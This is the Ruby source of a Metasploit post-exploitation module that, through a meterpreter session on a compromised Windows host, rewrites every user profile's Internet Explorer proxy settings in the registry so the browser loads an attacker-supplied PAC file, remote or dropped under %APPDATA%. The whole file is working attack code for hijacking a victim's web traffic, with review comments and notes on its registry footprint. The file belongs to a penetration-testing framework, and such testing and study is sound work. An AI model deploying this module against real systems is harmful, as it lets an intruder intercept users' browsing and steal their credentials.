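##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that rewrites the per-user WinINet proxy settings of every
# loaded user profile under HKEY_USERS so Internet Explorer uses a PAC
# script. All writes go to
# HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings
# (AutoConfigURL, ProxyEnable and Connections\DefaultConnectionSettings);
# from a monitoring standpoint those three values are the footprint this
# module leaves, plus a random-named *.pac under %APPDATA% in LOCAL_PAC mode.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv
  include Msf::Post::File
  include Msf::Post::Windows::Registry

  # Subkey (relative to HKEY_USERS\<SID>) holding the WinINet settings this
  # module edits. Single-quoted, so each '\\' is one backslash at runtime.
  INTERNET_SETTINGS_SUBKEY = 'Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Proxy PAC File',
        'Description' => %q{
          This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC
          option, a PAC file will be created on the victim host. It's also possible to provide a
          remote PAC file (REMOTE_PAC option) by providing the full URL.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
        'References' => [
          [ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],
          [ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]
        ],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_config_getenv
            ]
          }
        },
        'Notes' => {
          'Stability' => [SERVICE_RESOURCE_LOSS],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptPath.new('LOCAL_PAC', [false, 'Local PAC file.' ]),
        OptString.new('REMOTE_PAC', [false, 'Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)' ]),
        OptBool.new('DISABLE_PROXY', [true, 'Disable the proxy server.', false]),
        OptBool.new('AUTO_DETECT', [true, 'Automatically detect settings.', false])
      ]
    )
  end

  # Entry point. Installs the automatic configuration script (remote URL or a
  # file dropped under %APPDATA%), then optionally enables "Automatically
  # Detect Settings" and disables the static proxy, as selected by the
  # AUTO_DETECT and DISABLE_PROXY options. Failures of the two optional steps
  # are reported but do not abort the module.
  def run
    if datastore['LOCAL_PAC'].blank? && datastore['REMOTE_PAC'].blank?
      fail_with(Failure::BadConfig, 'You must set a remote or local PAC file. Aborting...')
    end

    # REMOTE_PAC takes precedence when both are given. Test with .blank?
    # rather than bare truthiness: an empty-string REMOTE_PAC is truthy in
    # Ruby and would otherwise have been pushed to the registry as the URL.
    if datastore['REMOTE_PAC'].blank?
      @remote = false
      print_status('Setting automatic configuration script from local PAC file ...')
      pac_file = create_pac(datastore['LOCAL_PAC'])
      unless pac_file
        print_error('There were problems creating the PAC proxy file. Aborting...')
        return
      end
      res = enable_proxypac(pac_file)
    else
      @remote = true
      print_status('Setting automatic configuration script from a remote PAC file ...')
      res = enable_proxypac(datastore['REMOTE_PAC'])
    end

    unless res
      print_error('Error while setting an automatic configuration script. Aborting...')
      return
    end

    print_good('Automatic configuration script configured...')

    if datastore['AUTO_DETECT']
      print_status('Enabling Automatically Detect Settings...')
      print_error('Failed to enable Automatically Detect Settings. Proceeding anyway...') unless auto_detect_on
    end

    return unless datastore['DISABLE_PROXY']

    print_status('Disabling the Proxy Server...')
    print_error('Failed to disable Proxy Server. Proceeding anyway...') unless disable_proxy
  end

  # Copy the operator-supplied PAC file to a randomly named *.pac under the
  # session user's %APPDATA%.
  #
  # @param local_pac [String] path of the PAC file on the local side
  # @return [String, false] target-side path of the written file, or false
  #   when the local file is missing, %APPDATA% cannot be resolved, or the
  #   write fails
  def create_pac(local_pac)
    # File.file? (not File.exist?) so a directory path is rejected here
    # instead of raising EISDIR on the read below.
    unless ::File.file?(local_pac)
      print_error('Local PAC file not found.')
      return false
    end

    appdata = session.sys.config.getenv('APPDATA')
    # NOTE(review): getenv is assumed to return nil/empty for an unset
    # variable rather than raise — confirm against the session API.
    if appdata.blank?
      print_error('Could not resolve %APPDATA% on the target.')
      return false
    end

    pac_file = "#{appdata}\\#{Rex::Text.rand_text_alpha(6..13)}.pac"

    # binread reads and closes the handle; File.open(...).read leaked it.
    conf_pac = ::File.binread(local_pac)

    return false unless write_file(pac_file, conf_pac)

    print_status("PAC proxy configuration file written to #{pac_file}")
    pac_file
  end

  # Set AutoConfigURL for every user profile and flag its connection
  # settings so the script is used.
  #
  # @param pac [String] URL of the PAC file when @remote is set, otherwise
  #   its path on the target (referenced as a file:// URL)
  # @return [Boolean] true if at least one profile was fully updated
  def enable_proxypac(pac)
    value_auto = 'AutoConfigURL'
    # Loop-invariant: same value is written to every profile.
    file = @remote ? pac.to_s : "file://#{pac}"
    proxy_pac_enabled = false

    user_profile_sids.each do |sid|
      key = internet_settings_key(sid)

      begin
        res = registry_setvaldata(key, value_auto, file, 'REG_SZ')
      rescue ::RuntimeError, Rex::TimeoutError
        next
      end

      # nil is how a failed write (Rex::Post::Meterpreter::RequestError)
      # surfaces here; skip the profile rather than patch its connection blob.
      next if res.nil?

      proxy_pac_enabled = true if change_connection(16, '05', "#{key}\\Connections")
    end

    proxy_pac_enabled
  end

  # Turn on "Automatically Detect Settings" for every user profile.
  #
  # @return [Boolean] true if at least one profile was updated
  def auto_detect_on
    auto_detect_enabled = false

    user_profile_sids.each do |sid|
      key = "#{internet_settings_key(sid)}\\Connections"
      next unless change_connection(16, '0D', key)

      print_good('Automatically Detect Settings on.')
      auto_detect_enabled = true
    end

    auto_detect_enabled
  end

  # Clear ProxyEnable (REG_DWORD 0) for every user profile.
  #
  # @return [Boolean] true if at least one profile was updated
  def disable_proxy
    value_enable = 'ProxyEnable'
    profile = false

    user_profile_sids.each do |sid|
      begin
        res = registry_setvaldata(internet_settings_key(sid), value_enable, 0, 'REG_DWORD')
      rescue ::RuntimeError, Rex::TimeoutError
        next
      end
      # Same convention as enable_proxypac: a nil result means the write
      # failed, so it must not count as success.
      profile = true unless res.nil?
    end

    return false unless profile

    print_good('Proxy disabled.')
    true
  end

  # Overwrite two hex digits of the REG_BINARY DefaultConnectionSettings
  # value under +key+ and write the blob back.
  #
  # @param offset [Integer] position in the hex-encoded blob (two hex digits
  #   per byte, so 16 addresses the ninth byte). NOTE(review): the callers
  #   treat that byte as the connection flags ('05' script, '0D' script +
  #   auto-detect) and overwrite rather than OR the existing bits — verify
  #   against the WinINet blob layout before relying on it.
  # @param value [String] exactly two hex digits to store at +offset+
  # @param key [String] full path of the profile's ...\Connections key
  # @return [Boolean] true on success; false when the value is missing,
  #   too short, +value+ is malformed, or a registry call fails
  def change_connection(offset, value, key)
    value_default = 'DefaultConnectionSettings'
    # Reject anything that is not two hex digits; pack('H*') would silently
    # mangle other characters.
    return false unless value.match?(/\A\h{2}\z/)

    begin
      value_con = registry_getvaldata(key, value_default)
      # Missing value or failed read: nothing to patch (nil.unpack would
      # have raised a NoMethodError that the rescue below does not catch).
      return false if value_con.nil?

      binary_data = value_con.unpack('H*').first
      # Guard the slice; a short blob used to raise IndexError instead of
      # returning false.
      return false if binary_data.length < offset + 2

      binary_data[offset, 2] = value
      # Re-encode the hex string directly. The earlier round trip through
      # Integer ('%x' % to_i(16)) dropped leading zero nibbles, which would
      # shift the whole blob by half a byte.
      res = registry_setvaldata(key, value_default, [binary_data].pack('H*'), 'REG_BINARY')
      return false if res.nil?
    rescue ::RuntimeError, Rex::TimeoutError
      return false
    end

    true
  end

  private

  # Subkey names under HKEY_USERS that belong to loaded user profiles: the
  # 'S-1-5-21-...' account SIDs, excluding their '_Classes' companion hives.
  # registry_enumkeys may yield nil when enumeration fails; treat as empty.
  def user_profile_sids
    Array(registry_enumkeys('HKU')).select do |k|
      k.include?('S-1-5-21') && !k.include?('_Classes')
    end
  end

  # Full path of a profile's WinINet "Internet Settings" key.
  def internet_settings_key(sid)
    "HKEY_USERS\\#{sid}\\#{INTERNET_SETTINGS_SUBKEY}"
  end
end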